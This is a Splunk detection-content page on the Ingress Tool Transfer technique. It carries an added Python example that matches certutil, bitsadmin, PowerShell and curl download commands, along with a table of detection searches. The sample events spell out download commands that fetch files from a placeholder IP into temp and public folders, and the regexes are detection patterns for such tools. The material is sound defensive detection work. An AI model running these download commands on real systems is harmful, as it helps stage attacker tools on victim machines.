Description
Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network, or through alternate protocols with another tool such as FTP.
- Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
- Datamodel: Endpoint
- Last Updated: 2021-03-24
- Author: Michael Haag, Splunk
- ID: b3782036-8cbd-11eb-9d8e-acde48001122
Narrative
Ingress tool transfer is a technique under the Command and Control tactic. Behaviors will include the use of living-off-the-land binaries to download implants or binaries over alternate communication ports. It is imperative to baseline applications on endpoints to understand what generates network activity, to where, and what its native behavior is. These utilities, when abused, will write files to disk in world-writable paths. During triage, review the reputation of the remote public destination IP or domain. Capture any files written to disk and perform analysis. Review other parallel processes for additional behaviors.
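As an added worked example (not one of Splunk's detection searches), the following Python applies the narrative's triage logic to constructed process-creation events: it flags the download-capable utilities named in the detections below, pulls out the remote destination for reputation review, and notes whether the command writes into a world-writable path. The event field names, regular expressions, hostnames and paths are all assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events (assumed field names, not Splunk data).
EVENTS = [
    {"host": "ws01", "process": "certutil.exe -urlcache -split -f http://198.51.100.7/a.exe C:\\Users\\Public\\a.exe"},
    {"host": "ws01", "process": "powershell.exe -nop -w hidden (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')"},
    {"host": "srv02", "process": "bitsadmin.exe /transfer job /download /priority high http://198.51.100.7/t.dll C:\\Windows\\Temp\\t.dll"},
    {"host": "lx03", "process": "curl -s http://198.51.100.7/x.sh -o /tmp/x.sh"},
    {"host": "ws01", "process": "certutil.exe -hashfile C:\\tools\\setup.msi SHA256"},  # benign native use
    {"host": "ws04", "process": "powershell.exe -File C:\\scripts\\inventory.ps1"},     # benign native use
]

# Command-line shapes of the download-capable utilities named in the detections list.
PATTERNS = {
    "CertUtil URLCache Download": re.compile(r"\bcertutil(\.exe)?\s.*-urlcache\b.*\s-f\s", re.I),
    "CertUtil VerifyCtl Download": re.compile(r"\bcertutil(\.exe)?\s.*-verifyctl\b.*\s-f\s", re.I),
    "BITSAdmin Download File": re.compile(r"\bbitsadmin(\.exe)?\s.*/transfer\b", re.I),
    "PowerShell DownloadFile": re.compile(r"\bpowershell.*DownloadFile", re.I),
    "PowerShell DownloadString": re.compile(r"\bpowershell.*DownloadString", re.I),
    "Curl/Wget Download": re.compile(r"^(curl|wget)\s.*https?://", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# World-writable staging paths the narrative says abused utilities write into (assumed list).
WRITABLE = re.compile(r"\\Users\\Public\\|\\Windows\\Temp\\|\\ProgramData\\|\\AppData\\Local\\Temp\\|\s/tmp/|\s/dev/shm/|\s/var/tmp/", re.I)


def classify(event):
    """Return a finding for a download-capable LOLBin command line, else None."""
    cmd = event["process"]
    for name, pattern in PATTERNS.items():
        if pattern.search(cmd):
            urls = URL_RE.findall(cmd)
            return {
                "host": event["host"],
                "detection": name,
                # Remote destination to check against reputation sources during triage.
                "dest": urlparse(urls[0]).hostname if urls else None,
                # Baseline deviation: a download utility writing into a world-writable path.
                "writes_world_writable": bool(WRITABLE.search(cmd)),
            }
    return None


def hunt(events):
    """Run every event through classify() and keep only the findings."""
    return [f for e in events if (f := classify(e)) is not None]
```

The two benign events (a hash check and a local script run) produce no finding, which is the baseline the narrative asks for; only the four download-shaped command lines surface, each with its destination host for reputation lookup.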
Detections
| Name | Technique | Type |
|---|---|---|
| Any Powershell DownloadFile | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP |
| Any Powershell DownloadString | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP |
| BITSAdmin Download File | BITS Jobs, Ingress Tool Transfer | TTP |
| CertUtil Download With URLCache and Split Arguments | Ingress Tool Transfer | TTP |
| CertUtil Download With VerifyCtl and Split Arguments | Ingress Tool Transfer | TTP |
| Curl Download and Bash Execution | Ingress Tool Transfer | TTP |
| Detect Certify Command Line Arguments | Steal or Forge Authentication Certificates, Ingress Tool Transfer | TTP |
| Detect Certipy File Modifications | Steal or Forge Authentication Certificates, Archive Collected Data | TTP |
| Linux Curl Upload File | Ingress Tool Transfer | TTP |
| Linux Ingress Tool Transfer Hunting | Ingress Tool Transfer | Hunting |
| Linux Ingress Tool Transfer with Curl | Ingress Tool Transfer | Anomaly |
| Linux Proxy Socks Curl | Proxy, Non-Application Layer Protocol | TTP |
| Suspicious Curl Network Connection | Ingress Tool Transfer | TTP |
| Wget Download and Bash Execution | Ingress Tool Transfer | TTP |
| Windows Bitsadmin Download File | BITS Jobs, Ingress Tool Transfer | TTP |
| Windows CertUtil URLCache Download | Ingress Tool Transfer | TTP |
| Windows CertUtil VerifyCtl Download | Ingress Tool Transfer | TTP |
| Windows Curl Download to Suspicious Path | Ingress Tool Transfer | TTP |
| Windows Curl Upload to Remote Destination | Ingress Tool Transfer | TTP |
| Windows Powershell DownloadFile | Automated Exfiltration | Anomaly |
| Windows Powershell DownloadString | Command and Scripting Interpreter, PowerShell, Ingress Tool Transfer | TTP |
Reference
source | version: 1